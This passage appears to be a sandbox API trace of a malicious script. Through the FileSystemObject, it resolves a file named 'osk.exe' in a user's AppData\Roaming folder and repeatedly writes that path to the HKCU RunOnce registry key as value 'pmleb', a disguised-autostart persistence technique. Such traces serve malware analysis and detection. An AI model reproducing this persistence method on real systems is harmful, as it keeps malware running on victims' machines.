riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.112] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x22 [0081.112] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.112] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.112] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.113] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.113] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.113] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.113] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.113] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.113] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.113] RegCloseKey (hKey=0x280) returned 0x0 [0081.113] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.114] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.114] SetTimer (hWnd=0x20280, nIDEvent=0x209e, uElapse=0xa, lpTimerFunc=0x0) returned 0x209e [0081.114] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.139] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.139] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.139] KillTimer (hWnd=0x20280, uIDEvent=0x209e) returned 1 [0081.140] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.140] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.140] IUnknown:Release (This=0x787518) returned 0x1 [0081.140] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.140] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.140] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.140] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.140] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.140] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.140] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.140] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.140] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.141] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x23 [0081.141] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.141] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x24 [0081.141] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.142] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x23 [0081.142] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.142] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.142] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.142] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.142] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.142] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.142] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.142] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.142] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.142] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.142] RegCloseKey (hKey=0x280) returned 0x0 [0081.143] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.143] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.143] SetTimer (hWnd=0x20280, nIDEvent=0x209f, uElapse=0xa, lpTimerFunc=0x0) returned 0x209f [0081.143] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.157] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.157] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.157] KillTimer (hWnd=0x20280, uIDEvent=0x209f) returned 1 [0081.157] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.157] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.158] IUnknown:Release (This=0x787518) returned 0x1 [0081.158] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.158] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.158] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.158] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.158] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.158] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.158] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.158] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.158] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.158] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x24 [0081.158] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.158] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x25 [0081.158] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.159] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x24 [0081.159] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.159] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.159] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.159] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.159] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.160] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.160] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.160] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.160] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.160] RegCloseKey (hKey=0x280) returned 0x0 [0081.160] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.160] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.160] SetTimer (hWnd=0x20280, nIDEvent=0x20a0, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a0 [0081.160] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.172] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.172] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.172] KillTimer (hWnd=0x20280, uIDEvent=0x20a0) returned 1 [0081.173] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.173] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.173] IUnknown:Release (This=0x787518) returned 0x1 [0081.173] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.173] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.173] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.173] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.173] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.173] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.173] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.173] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.173] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.173] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x25 [0081.173] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, 